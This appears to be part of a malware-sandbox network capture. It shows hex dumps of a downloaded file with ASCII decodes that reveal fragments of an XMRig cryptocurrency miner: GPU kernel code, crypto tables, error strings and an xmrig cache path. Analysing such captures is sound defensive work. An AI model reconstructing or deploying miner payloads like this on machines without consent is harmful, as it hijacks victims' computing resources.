                                                                                                                                                                                                                    Data Ascii: 3dU,0xf9ae1132U,0x29c76da1U,0x9e1d4b2fU,0xb2dcf330U,0x860dec52U,0xc177d0e3U,0xb32b6c16U,0x70a999b9U,0x9411fa48U,0xe9472264U,0xfca8c48cU,0xf0a01a3fU,0x7d56d82cU,0x3322ef90U,0x4987c74eU,0x38d9c1d1U,0xca8cfea2U,0xd498360bU,0xf5a6cf81U,0x7aa528deU,0xb7da
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC6385INData Raw: 67 65 74 5f 62 79 74 65 33 32 28 79 5b 30 5d 2c 73 33 29 5d 5e 30 78 35 31 66 34 65 30 33 63 3b 0a 78 5b 32 5d 3d 74 30 5b 67 65 74 5f 62 79 74 65 33 32 28 79 5b 32 5d 2c 30 29 5d 5e 74 31 5b 67 65 74 5f 62 79 74 65 33 32 28 79 5b 33 5d 2c 73 31 29 5d 5e 74 32 5b 67 65 74 5f 62 79 74 65 33 32 28 79 5b 30 5d 2c 31 36 29 5d 5e 74 33 5b 67 65 74 5f 62 79 74 65 33 32 28 79 5b 31 5d 2c 73 33 29 5d 5e 30 78 65 65 31 30 34 33 63 36 3b 0a 78 5b 33 5d 3d 74 30 5b 67 65 74 5f 62 79 74 65 33 32 28 79 5b 33 5d 2c 30 29 5d 5e 74 31 5b 67 65 74 5f 62 79 74 65 33 32 28 79 5b 30 5d 2c 73 31 29 5d 5e 74 32 5b 67 65 74 5f 62 79 74 65 33 32 28 79 5b 31 5d 2c 31 36 29 5d 5e 74 33 5b 67 65 74 5f 62 79 74 65 33 32 28 79 5b 32 5d 2c 73 33 29 5d 5e 30 78 65 64 31 38 66 39 39 62
                                                                                                                                                                                                                    Data Ascii: get_byte32(y[0],s3)]^0x51f4e03c;x[2]=t0[get_byte32(y[2],0)]^t1[get_byte32(y[3],s1)]^t2[get_byte32(y[0],16)]^t3[get_byte32(y[1],s3)]^0xee1043c6;x[3]=t0[get_byte32(y[3],0)]^t1[get_byte32(y[0],s1)]^t2[get_byte32(y[1],16)]^t3[get_byte32(y[2],s3)]^0xed18f99b
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC6401INData Raw: 5f 63 66 72 6f 75 6e 64 3d 30 3b 0a 69 6e 74 33 32 5f 74 20 6c 61 73 74 5f 75 73 65 64 5f 73 6c 6f 74 3d 2d 31 3b 0a 69 6e 74 33 32 5f 74 20 6c 61 73 74 5f 6d 65 6d 6f 72 79 5f 6f 70 5f 73 6c 6f 74 3d 2d 31 3b 0a 75 69 6e 74 33 32 5f 74 20 6e 75 6d 5f 73 6c 6f 74 73 5f 75 73 65 64 3d 30 3b 0a 75 69 6e 74 33 32 5f 74 20 6e 75 6d 5f 69 6e 73 74 72 75 63 74 69 6f 6e 73 3d 30 3b 0a 69 6e 74 33 32 5f 74 20 66 69 72 73 74 5f 69 6e 73 74 72 75 63 74 69 6f 6e 5f 73 6c 6f 74 3d 2d 31 3b 0a 62 6f 6f 6c 20 66 69 72 73 74 5f 69 6e 73 74 72 75 63 74 69 6f 6e 5f 66 70 3d 66 61 6c 73 65 3b 0a 62 6f 6f 6c 20 75 70 64 61 74 65 5f 62 72 61 6e 63 68 5f 74 61 72 67 65 74 5f 6d 61 72 6b 3d 66 61 6c 73 65 3b 0a 62 6f 6f 6c 20 66 69 72 73 74 5f 61 76 61 69 6c 61 62 6c 65 5f 73
                                                                                                                                                                                                                    Data Ascii: _cfround=0;int32_t last_used_slot=-1;int32_t last_memory_op_slot=-1;uint32_t num_slots_used=0;uint32_t num_instructions=0;int32_t first_instruction_slot=-1;bool first_instruction_fp=false;bool update_branch_target_mark=false;bool first_available_s
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC6417INData Raw: 72 63 3d 3d 64 73 74 29 3f 33 3a 28 28 6d 6f 64 20 25 20 34 29 3f 31 3a 32 29 3b 0a 69 6e 73 74 2e 78 3d 28 64 73 74 3c 3c 44 53 54 5f 4f 46 46 53 45 54 29 7c 28 73 72 63 3c 3c 53 52 43 5f 4f 46 46 53 45 54 29 7c 28 31 3c 3c 4c 4f 43 5f 4f 46 46 53 45 54 29 7c 28 33 3c 3c 4f 50 43 4f 44 45 5f 4f 46 46 53 45 54 29 3b 0a 69 6e 73 74 2e 78 7c 3d 69 6d 6d 5f 69 6e 64 65 78 3c 3c 49 4d 4d 5f 4f 46 46 53 45 54 3b 0a 69 66 28 69 6d 6d 5f 69 6e 64 65 78 3c 49 4d 4d 5f 49 4e 44 45 58 5f 43 4f 55 4e 54 29 0a 69 6d 6d 5f 62 75 66 5b 69 6d 6d 5f 69 6e 64 65 78 2b 2b 5d 3d 28 69 6e 73 74 2e 79 26 30 78 46 43 31 46 46 46 46 46 55 29 7c 28 28 28 6c 6f 63 61 74 69 6f 6e 3d 3d 31 29 3f 4c 4f 43 5f 4c 31 3a 28 28 6c 6f 63 61 74 69 6f 6e 3d 3d 32 29 3f 4c 4f 43 5f 4c 32 3a
                                                                                                                                                                                                                    Data Ascii: rc==dst)?3:((mod % 4)?1:2);inst.x=(dst<<DST_OFFSET)|(src<<SRC_OFFSET)|(1<<LOC_OFFSET)|(3<<OPCODE_OFFSET);inst.x|=imm_index<<IMM_OFFSET;if(imm_index<IMM_INDEX_COUNT)imm_buf[imm_index++]=(inst.y&0xFC1FFFFFU)|(((location==1)?LOC_L1:((location==2)?LOC_L2:
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC6433INData Raw: 66 73 65 74 3d 31 39 32 2b 28 28 67 6c 6f 62 61 6c 5f 69 6e 64 65 78 26 31 29 3c 3c 33 29 3b 0a 5f 5f 6c 6f 63 61 6c 20 75 69 6e 74 36 34 5f 74 2a 20 65 4d 61 73 6b 3d 52 2b 31 38 3b 0a 63 6f 6e 73 74 20 75 69 6e 74 33 32 5f 74 20 70 72 6f 67 72 61 6d 5f 6c 65 6e 67 74 68 3d 28 28 5f 5f 6c 6f 63 61 6c 20 75 69 6e 74 33 32 5f 74 2a 29 28 52 2b 32 30 29 29 5b 30 5d 3b 0a 75 69 6e 74 33 32 5f 74 20 66 70 72 63 3d 28 28 5f 5f 67 6c 6f 62 61 6c 20 75 69 6e 74 33 32 5f 74 2a 29 72 6f 75 6e 64 69 6e 67 29 5b 69 64 78 5d 3b 0a 75 69 6e 74 33 32 5f 74 20 73 70 41 64 64 72 30 3d 66 69 72 73 74 3f 6d 78 3a 30 3b 0a 75 69 6e 74 33 32 5f 74 20 73 70 41 64 64 72 31 3d 66 69 72 73 74 3f 6d 61 3a 30 3b 0a 5f 5f 67 6c 6f 62 61 6c 20 75 69 6e 74 38 5f 74 2a 20 73 63 72 61
                                                                                                                                                                                                                    Data Ascii: fset=192+((global_index&1)<<3);__local uint64_t* eMask=R+18;const uint32_t program_length=((__local uint32_t*)(R+20))[0];uint32_t fprc=((__global uint32_t*)rounding)[idx];uint32_t spAddr0=first?mx:0;uint32_t spAddr1=first?ma:0;__global uint8_t* scra
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC6449INData Raw: 33 64 75 2b 28 64 73 74 3c 3c 31 29 2b 28 64 73 74 3c 3c 32 35 29 3b 0a 2a 28 70 2b 2b 29 3d 30 78 62 66 38 63 63 30 37 66 75 3b 0a 72 65 74 75 72 6e 20 70 3b 0a 7d 0a 6f 70 63 6f 64 65 2d 3d 52 41 4e 44 4f 4d 58 5f 46 52 45 51 5f 46 53 57 41 50 5f 52 3b 0a 69 66 28 6f 70 63 6f 64 65 3c 52 41 4e 44 4f 4d 58 5f 46 52 45 51 5f 46 41 44 44 5f 52 29 0a 7b 0a 2a 28 70 2b 2b 29 3d 56 5f 41 44 44 5f 46 36 34 2b 28 28 64 73 74 26 33 29 3c 3c 31 29 3b 0a 2a 28 70 2b 2b 29 3d 30 78 30 30 30 32 36 39 33 63 75 2b 28 28 64 73 74 26 33 29 3c 3c 31 29 2b 28 28 73 72 63 26 33 29 3c 3c 31 30 29 3b 0a 72 65 74 75 72 6e 20 70 3b 0a 7d 0a 6f 70 63 6f 64 65 2d 3d 52 41 4e 44 4f 4d 58 5f 46 52 45 51 5f 46 41 44 44 5f 52 3b 0a 69 66 28 6f 70 63 6f 64 65 3c 52 41 4e 44 4f 4d 58
                                                                                                                                                                                                                    Data Ascii: 3du+(dst<<1)+(dst<<25);*(p++)=0xbf8cc07fu;return p;}opcode-=RANDOMX_FREQ_FSWAP_R;if(opcode<RANDOMX_FREQ_FADD_R){*(p++)=V_ADD_F64+((dst&3)<<1);*(p++)=0x0002693cu+((dst&3)<<1)+((src&3)<<10);return p;}opcode-=RANDOMX_FREQ_FADD_R;if(opcode<RANDOMX
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC6465INData Raw: 3d 69 6e 73 74 3b 0a 6a 69 74 5f 70 72 65 66 65 74 63 68 5f 76 67 70 72 5f 69 6e 64 65 78 3d 2d 76 67 70 72 5f 69 64 3b 0a 6a 69 74 5f 76 6d 63 6e 74 3d 28 76 6d 63 6e 74 3c 73 5f 77 61 69 74 63 6e 74 5f 76 61 6c 75 65 29 3f 76 6d 63 6e 74 3a 2d 31 3b 0a 69 66 28 76 6d 63 6e 74 3c 73 5f 77 61 69 74 63 6e 74 5f 76 61 6c 75 65 29 0a 73 5f 77 61 69 74 63 6e 74 5f 76 61 6c 75 65 3d 76 6d 63 6e 74 3b 0a 64 6f 6e 65 3d 74 72 75 65 3b 0a 7d 0a 70 3d 6a 69 74 5f 65 6d 69 74 5f 69 6e 73 74 72 75 63 74 69 6f 6e 28 70 2c 6c 61 73 74 5f 62 72 61 6e 63 68 5f 74 61 72 67 65 74 2c 6a 69 74 5f 69 6e 73 74 2c 6a 69 74 5f 70 72 65 66 65 74 63 68 5f 76 67 70 72 5f 69 6e 64 65 78 2c 6a 69 74 5f 76 6d 63 6e 74 2c 62 61 74 63 68 5f 73 69 7a 65 29 3b 0a 69 66 28 70 2d 73 74 61
                                                                                                                                                                                                                    Data Ascii: =inst;jit_prefetch_vgpr_index=-vgpr_id;jit_vmcnt=(vmcnt<s_waitcnt_value)?vmcnt:-1;if(vmcnt<s_waitcnt_value)s_waitcnt_value=vmcnt;done=true;}p=jit_emit_instruction(p,last_branch_target,jit_inst,jit_prefetch_vgpr_index,jit_vmcnt,batch_size);if(p-sta
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC6481INData Raw: 46 35 39 32 38 45 42 38 35 39 33 37 45 34 34 55 4c 2c 0a 30 78 34 41 33 31 32 34 42 33 33 37 36 39 35 46 37 30 55 4c 2c 30 78 36 35 45 34 44 36 31 44 46 31 32 38 38 36 35 45 55 4c 2c 30 78 45 37 32 30 42 39 35 31 30 34 37 37 31 42 43 37 55 4c 2c 30 78 38 41 38 37 44 34 32 33 45 38 34 33 46 45 37 34 55 4c 2c 0a 30 78 46 32 39 34 37 36 39 32 41 33 45 38 32 39 37 44 55 4c 2c 30 78 43 31 44 39 33 30 39 42 30 39 37 41 43 42 44 44 55 4c 2c 30 78 45 30 31 42 44 43 35 42 46 42 33 30 31 42 31 44 55 4c 2c 30 78 42 46 38 32 39 43 46 32 34 46 34 39 32 34 44 41 55 4c 2c 0a 30 78 46 46 42 46 37 30 42 34 33 31 42 41 45 37 41 34 55 4c 2c 30 78 34 38 42 43 46 38 44 45 30 35 34 34 33 32 30 44 55 4c 2c 30 78 33 39 44 33 42 42 35 33 33 32 46 43 41 45 33 42 55 4c 2c 30 78 41
                                                                                                                                                                                                                    Data Ascii: F5928EB85937E44UL,0x4A3124B337695F70UL,0x65E4D61DF128865EUL,0xE720B95104771BC7UL,0x8A87D423E843FE74UL,0xF2947692A3E8297DUL,0xC1D9309B097ACBDDUL,0xE01BDC5BFB301B1DUL,0xBF829CF24F4924DAUL,0xFFBF70B431BAE7A4UL,0x48BCF8DE0544320DUL,0x39D3BB5332FCAE3BUL,0xA
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC6497INData Raw: 30 78 32 35 36 46 41 30 43 46 43 46 32 35 38 35 36 46 55 4c 2c 0a 30 78 41 46 45 41 32 30 43 41 43 41 41 46 38 46 45 41 55 4c 2c 30 78 38 45 38 39 37 44 46 34 46 34 38 45 46 33 38 39 55 4c 2c 30 78 45 39 32 30 36 37 34 37 34 37 45 39 38 45 32 30 55 4c 2c 30 78 31 38 32 38 33 38 31 30 31 30 31 38 32 30 32 38 55 4c 2c 0a 30 78 44 35 36 34 30 42 36 46 36 46 44 35 44 45 36 34 55 4c 2c 30 78 38 38 38 33 37 33 46 30 46 30 38 38 46 42 38 33 55 4c 2c 30 78 36 46 42 31 46 42 34 41 34 41 36 46 39 34 42 31 55 4c 2c 30 78 37 32 39 36 43 41 35 43 35 43 37 32 42 38 39 36 55 4c 2c 0a 30 78 32 34 36 43 35 34 33 38 33 38 32 34 37 30 36 43 55 4c 2c 30 78 46 31 30 38 35 46 35 37 35 37 46 31 41 45 30 38 55 4c 2c 30 78 43 37 35 32 32 31 37 33 37 33 43 37 45 36 35 32 55 4c 2c
                                                                                                                                                                                                                    Data Ascii: 0x256FA0CFCF25856FUL,0xAFEA20CACAAF8FEAUL,0x8E897DF4F48EF389UL,0xE920674747E98E20UL,0x1828381010182028UL,0xD5640B6F6FD5DE64UL,0x888373F0F088FB83UL,0x6FB1FB4A4A6F94B1UL,0x7296CA5C5C72B896UL,0x246C54383824706CUL,0xF1085F5757F1AE08UL,0xC752217373C7E652UL,
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC6513INData Raw: 28 75 69 6e 74 34 20 2a 29 63 29 5b 30 5d 2c 28 28 75 69 6e 74 34 20 2a 29 61 29 5b 30 5d 29 3b 0a 23 65 6c 73 65 0a 28 28 75 69 6e 74 34 20 2a 29 63 29 5b 30 5d 3d 41 45 53 5f 52 6f 75 6e 64 5f 54 77 6f 5f 54 61 62 6c 65 73 28 41 45 53 30 2c 41 45 53 31 2c 28 28 75 69 6e 74 34 20 2a 29 63 29 5b 30 5d 2c 28 28 75 69 6e 74 34 20 2a 29 61 29 5b 30 5d 29 3b 0a 23 65 6e 64 69 66 0a 62 5f 78 20 5e 3d 20 28 28 75 69 6e 74 34 20 2a 29 63 29 5b 30 5d 3b 0a 56 41 52 49 41 4e 54 31 5f 31 28 62 5f 78 29 3b 0a 53 63 72 61 74 63 68 70 61 64 5b 49 44 58 28 28 49 44 58 5f 30 26 4d 41 53 4b 29 3e 3e 34 29 5d 3d 62 5f 78 3b 0a 75 69 6e 74 34 20 74 6d 70 3b 0a 74 6d 70 3d 53 63 72 61 74 63 68 70 61 64 5b 49 44 58 28 28 61 73 5f 75 69 6e 74 32 28 63 5b 30 5d 29 2e 73 30 26
                                                                                                                                                                                                                    Data Ascii: (uint4 *)c)[0],((uint4 *)a)[0]);#else((uint4 *)c)[0]=AES_Round_Two_Tables(AES0,AES1,((uint4 *)c)[0],((uint4 *)a)[0]);#endifb_x ^= ((uint4 *)c)[0];VARIANT1_1(b_x);Scratchpad[IDX((IDX_0&MASK)>>4)]=b_x;uint4 tmp;tmp=Scratchpad[IDX((as_uint2(c[0]).s0&
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC6529INData Raw: 00 00 00 08 00 00 00 00 00 00 00 42 55 49 4c 44 20 4c 4f 47 3a 0a 25 73 0a 00 00 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 32 33 34 35 36 37 00 00 00 00 00 00 00 00 62 61 73 69 63 5f 73 74 72 69 6e 67 3a 3a 5f 4d 5f 63 6f 6e 73 74 72 75 63 74 20 6e 75 6c 6c 20 6e 6f 74 20 76 61 6c 69 64 00 62 61 73 69 63 5f 73 74 72 69 6e 67 3a 3a 61 70 70 65 6e 64 00 00 63 61 6e 6e 6f 74 20 63 72 65 61 74 65 20 73 74 64 3a 3a 76 65 63 74 6f 72 20 6c 61 72 67 65 72 20 74 68 61 6e 20 6d 61 78 5f 73 69 7a 65 28 29 00 5c 78 6d 72 69 67 5c 2e 63 61 63 68 65 5c 00 2e 62 69 6e 00 00 00 00 25 73 20 47 50 55 20 1b 5b 31 3b 33 37 6d 23 25 7a 75 1b 5b 30 6d 20 1b 5b 31 3b 33 33 6d 63 6f 6d 70 69 6c 69 6e 67 2e 2e 2e 1b 5b 30 6d 00 00 25 73 20 47
                                                                                                                                                                                                                    Data Ascii: BUILD LOG:%sABCDEFGHIJKLMNOPQRSTUVWXYZ234567basic_string::_M_construct null not validbasic_string::appendcannot create std::vector larger than max_size()\xmrig\.cache\.bin%s GPU [1;37m#%zu[0m [1;33mcompiling...[0m%s G
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC6545INData Raw: 5f 41 4c 4c 4f 43 41 54 49 4f 4e 5f 46 41 49 4c 55 52 45 00 43 4c 5f 4f 55 54 5f 4f 46 5f 52 45 53 4f 55 52 43 45 53 00 43 4c 5f 4f 55 54 5f 4f 46 5f 48 4f 53 54 5f 4d 45 4d 4f 52 59 00 00 00 00 00 00 43 4c 5f 50 52 4f 46 49 4c 49 4e 47 5f 49 4e 46 4f 5f 4e 4f 54 5f 41 56 41 49 4c 41 42 4c 45 00 43 4c 5f 4d 45 4d 5f 43 4f 50 59 5f 4f 56 45 52 4c 41 50 00 43 4c 5f 49 4d 41 47 45 5f 46 4f 52 4d 41 54 5f 4d 49 53 4d 41 54 43 48 00 43 4c 5f 49 4d 41 47 45 5f 46 4f 52 4d 41 54 5f 4e 4f 54 5f 53 55 50 50 4f 52 54 45 44 00 43 4c 5f 42 55 49 4c 44 5f 50 52 4f 47 52 41 4d 5f 46 41 49 4c 55 52 45 00 43 4c 5f 4d 41 50 5f 46 41 49 4c 55 52 45 00 00 00 00 00 00 43 4c 5f 4d 49 53 41 4c 49 47 4e 45 44 5f 53 55 42 5f 42 55 46 46 45 52 5f 4f 46 46 53 45 54 00 43 4c 5f 45
                                                                                                                                                                                                                    Data Ascii: _ALLOCATION_FAILURECL_OUT_OF_RESOURCESCL_OUT_OF_HOST_MEMORYCL_PROFILING_INFO_NOT_AVAILABLECL_MEM_COPY_OVERLAPCL_IMAGE_FORMAT_MISMATCHCL_IMAGE_FORMAT_NOT_SUPPORTEDCL_BUILD_PROGRAM_FAILURECL_MAP_FAILURECL_MISALIGNED_SUB_BUFFER_OFFSETCL_E
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC6561INData Raw: 00 00 00 80 fb 7f d5 00 00 00 00 80 ff ff d5 00 00 00 00 80 ff 7f d6 00 00 00 00 80 f5 ff d6 00 00 00 00 80 f9 7f d7 00 00 00 00 80 fa ff d7 00 00 00 00 80 fa 7f d8 00 00 00 00 80 db ff d8 00 00 00 00 80 fc 7f d9 00 00 00 00 80 f4 ff d9 00 00 00 00 80 ff 7f da 00 00 00 00 80 f6 ff da 00 00 00 00 80 fa 7f db 00 00 00 00 80 f5 ff db 00 00 00 00 80 df 7f dc 00 00 00 00 80 fe ff dc 00 00 00 00 80 fc 7f dd 00 00 00 00 80 fc ff dd 00 00 00 00 80 ec 7f de 00 00 00 00 80 fb ff de 00 00 00 00 80 fa 7f df 00 00 00 00 80 eb ff df 00 00 00 00 80 f2 7f e0 00 00 00 00 80 fc ff e0 00 00 00 00 80 f7 7f e1 00 00 00 00 80 fe ff e1 00 00 00 00 80 f3 7f e2 00 00 00 00 80 fe ff e2 00 00 00 00 80 fb 7f e3 00 00 00 00 80 fd ff e3 00 00 00 00 80 fb 7f e4 00 00 00 00 80 fc ff e4
                                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC6577INData Raw: 00 00 00 00 00 00 00 00 00 00 00 65 6e 61 62 6c 65 64 00 6c 6f 61 64 65 72 00 6e 76 6d 6c 00 76 65 63 74 6f 72 3a 3a 5f 4d 5f 72 65 61 6c 6c 6f 63 5f 69 6e 73 65 72 74 00 76 65 63 74 6f 72 3a 3a 72 65 73 65 72 76 65 00 00 00 25 73 1b 5b 30 3b 33 33 6d 20 73 6b 69 70 20 6e 6f 6e 2d 65 78 69 73 74 69 6e 67 20 64 65 76 69 63 65 20 77 69 74 68 20 69 6e 64 65 78 20 1b 5b 30 6d 1b 5b 31 3b 33 33 6d 25 75 1b 5b 30 6d 00 2a 00 62 66 61 63 74 6f 72 2d 68 69 6e 74 00 62 73 6c 65 65 70 2d 68 69 6e 74 00 64 65 76 69 63 65 73 2d 68 69 6e 74 00 07 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 69 6e 64 65 78 00 74 68 72 65 61 64 73 00 62 6c 6f 63 6b 73 00 62 66 61 63 74 6f 72 00 62 73 6c 65 65 70 00 61 66 66 69 6e 69 74 79 00 64 61 74 61 73 65 74
                                                                                                                                                                                                                    Data Ascii: enabledloadernvmlvector::_M_realloc_insertvector::reserve%s[0;33m skip non-existing device with index [0m[1;33m%u[0m*bfactor-hintbsleep-hintdevices-hintindexthreadsblocksbfactorbsleepaffinitydataset
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC6593INData Raw: 00 00 00 80 f7 7f d9 03 00 00 00 80 ef ff d9 03 00 00 00 80 f0 7f da 03 00 00 00 80 f9 ff da 03 00 00 00 80 f1 7f db 03 00 00 00 80 fc ff db 03 00 00 00 80 f3 7f dc 03 00 00 00 80 fb ff dc 03 00 00 00 80 ef 7f dd 03 00 00 00 80 fc ff dd 03 00 00 00 80 fe 7f de 03 00 00 00 80 f6 ff de 03 00 00 00 80 f7 7f df 03 00 00 00 80 f7 ff df 03 00 00 00 80 fb 7f e0 03 00 00 00 80 f9 ff e0 03 00 00 00 80 fe 7f e1 03 00 00 00 80 ff ff e1 03 00 00 00 80 f3 7f e2 03 00 00 00 80 fb ff e2 03 00 00 00 80 fe 7f e3 03 00 00 00 80 d2 ff e3 03 00 00 00 80 f2 7f e4 03 00 00 00 80 fe ff e4 03 00 00 00 80 ff 7f e5 03 00 00 00 80 fe ff e5 03 00 00 00 80 fe 7f e6 03 00 00 00 80 f7 ff e6 03 00 00 00 80 fe 7f e7 03 00 00 00 80 f9 ff e7 03 00 00 00 80 ea 7f e8 03 00 00 00 80 fe ff e8
                                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC6609INData Raw: cf a8 ff 9a cf a8 ff 36 bf a8 ff 5d d0 a8 ff 4f d0 a8 ff 47 d0 a8 ff 3f d0 a8 ff 37 d0 a8 ff f2 cf a8 ff 1a bf a8 ff b5 d0 a8 ff a7 d0 a8 ff 9f d0 a8 ff 97 d0 a8 ff 8f d0 a8 ff 4a d0 a8 ff fe be a8 ff 0d d1 a8 ff ff d0 a8 ff f7 d0 a8 ff ef d0 a8 ff e7 d0 a8 ff a2 d0 a8 ff e2 be a8 ff e5 d1 a8 ff d4 d1 a8 ff c9 d1 a8 ff be d1 a8 ff b3 d1 a8 ff fa d0 a8 ff c6 be a8 ff 8e d1 a8 ff 80 d1 a8 ff 78 d1 a8 ff 70 d1 a8 ff 68 d1 a8 ff 23 d1 a8 ff aa be a8 ff 04 d2 a8 ff b9 d1 a8 ff 25 d2 a8 ff 1d d2 a8 ff 15 d2 a8 ff 0d d2 a8 ff 8e be a8 ff 7c d2 a8 ff 6e d2 a8 ff 66 d2 a8 ff 5e d2 a8 ff 56 d2 a8 ff 11 d2 a8 ff 72 be a8 ff c1 d3 a8 ff b0 d3 a8 ff a5 d3 a8 ff 9a d3 a8 ff 8f d3 a8 ff 69 d2 a8 ff 56 be a8 ff 67 d3 a8 ff 56 d3 a8 ff 4b d3 a8 ff 40 d3 a8 ff 35 d3 a8 ff
                                                                                                                                                                                                                    Data Ascii: 6]OG?7Jxph#%|nf^VriVgVK@5
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC6625INData Raw: 00 00 00 40 fd 4d 03 00 00 00 00 40 ff 4f 03 00 00 00 00 c0 fd 51 03 00 00 00 00 40 fe 53 03 00 00 00 00 c0 fd 55 03 00 00 00 00 40 fc 57 03 00 00 00 00 40 fb 59 03 00 00 00 00 c0 f6 5b 03 00 00 00 00 c0 f8 5d 03 00 00 00 00 40 fb 5f 03 00 00 00 00 40 fe 61 03 00 00 00 00 c0 fe 63 03 00 00 00 00 c0 fc 65 03 00 00 00 00 c0 fd 67 03 00 00 00 00 40 ff 69 03 00 00 00 00 c0 fe 6b 03 00 00 00 00 40 ff 6d 03 00 00 00 00 c0 fd 6f 03 00 00 00 00 c0 fe 71 03 00 00 00 00 40 ff 73 03 00 00 00 00 c0 fe 75 03 00 00 00 00 40 fd 77 03 00 00 00 00 c0 ff 79 03 00 00 00 00 40 fd 7b 03 00 00 00 00 c0 fe 7d 03 00 00 00 00 c0 ff 7f 03 00 00 00 00 c0 fa 81 03 00 00 00 00 40 fd 83 03 00 00 00 00 40 fe 85 03 00 00 00 00 c0 fb 87 03 00 00 00 00 c0 ff 89 03 00 00 00 00 c0 ff 8b 03
                                                                                                                                                                                                                    Data Ascii: @M@OQ@SU@W@Y[]@_@aceg@ik@moq@su@wy@{}@@
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC6641INData Raw: 00 00 00 80 fc 7f d3 00 00 00 00 80 e6 ff d3 00 00 00 00 80 fb 7f d4 00 00 00 00 80 f9 ff d4 00 00 00 00 80 fb 7f d5 00 00 00 00 80 ff ff d5 00 00 00 00 80 ff 7f d6 00 00 00 00 80 f5 ff d6 00 00 00 00 80 f9 7f d7 00 00 00 00 80 fa ff d7 00 00 00 00 80 fa 7f d8 00 00 00 00 80 db ff d8 00 00 00 00 80 fc 7f d9 00 00 00 00 80 f4 ff d9 00 00 00 00 80 ff 7f da 00 00 00 00 80 f6 ff da 00 00 00 00 80 fa 7f db 00 00 00 00 80 f5 ff db 00 00 00 00 80 df 7f dc 00 00 00 00 80 fe ff dc 00 00 00 00 80 fc 7f dd 00 00 00 00 80 fc ff dd 00 00 00 00 80 ec 7f de 00 00 00 00 80 fb ff de 00 00 00 00 80 fa 7f df 00 00 00 00 80 eb ff df 00 00 00 00 80 f2 7f e0 00 00 00 00 80 fc ff e0 00 00 00 00 80 f7 7f e1 00 00 00 00 80 fe ff e1 00 00 00 00 80 f3 7f e2 00 00 00 00 80 fe ff e2
                                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC6657INData Raw: 00 00 00 80 fd 7f c9 00 00 00 00 80 ff ff c9 00 00 00 00 80 f9 7f ca 00 00 00 00 80 fd ff ca 00 00 00 00 80 fe 7f cb 00 00 00 00 80 ff ff cb 00 00 00 00 80 f5 7f cc 00 00 00 00 80 fc ff cc 00 00 00 00 80 f1 7f cd 00 00 00 00 80 f8 ff cd 00 00 00 00 80 fb 7f ce 00 00 00 00 80 ff ff ce 00 00 00 00 80 f2 7f cf 00 00 00 00 80 e9 ff cf 00 00 00 00 80 fd 7f d0 00 00 00 00 80 f1 ff d0 00 00 00 00 80 fe 7f d1 00 00 00 00 80 fa ff d1 00 00 00 00 80 fe 7f d2 00 00 00 00 80 ea ff d2 00 00 00 00 80 fc 7f d3 00 00 00 00 80 e6 ff d3 00 00 00 00 80 fb 7f d4 00 00 00 00 80 f9 ff d4 00 00 00 00 80 fb 7f d5 00 00 00 00 80 ff ff d5 00 00 00 00 80 ff 7f d6 00 00 00 00 80 f5 ff d6 00 00 00 00 80 f9 7f d7 00 00 00 00 80 fa ff d7 00 00 00 00 80 fa 7f d8 00 00 00 00 80 db ff d8
                                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC6673INData Raw: 00 00 00 9e 0a 14 40 01 00 00 00 9e 0a 14 40 01 00 00 00 9e 0a 14 40 01 00 00 00 9e 0a 14 40 01 00 00 00 9e 0a 14 40 01 00 00 00 9e 0a 14 40 01 00 00 00 9e 0a 14 40 01 00 00 00 a1 0a 14 40 01 00 00 00 a4 0a 14 40 01 00 00 00 a4 0a 14 40 01 00 00 00 a4 0a 14 40 01 00 00 00 a4 0a 14 40 01 00 00 00 a4 0a 14 40 01 00 00 00 a4 0a 14 40 01 00 00 00 a4 0a 14 40 01 00 00 00 a7 0a 14 40 01 00 00 00 aa 0a 14 40 01 00 00 00 aa 0a 14 40 01 00 00 00 aa 0a 14 40 01 00 00 00 aa 0a 14 40 01 00 00 00 aa 0a 14 40 01 00 00 00 aa 0a 14 40 01 00 00 00 aa 0a 14 40 01 00 00 00 ad 0a 14 40 01 00 00 00 b0 0a 14 40 01 00 00 00 b0 0a 14 40 01 00 00 00 b0 0a 14 40 01 00 00 00 b0 0a 14 40 01 00 00 00 b0 0a 14 40 01 00 00 00 b0 0a 14 40 01 00 00 00 b0 0a 14 40 01 00 00 00 b3 0a 14 40
                                                                                                                                                                                                                    Data Ascii: @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
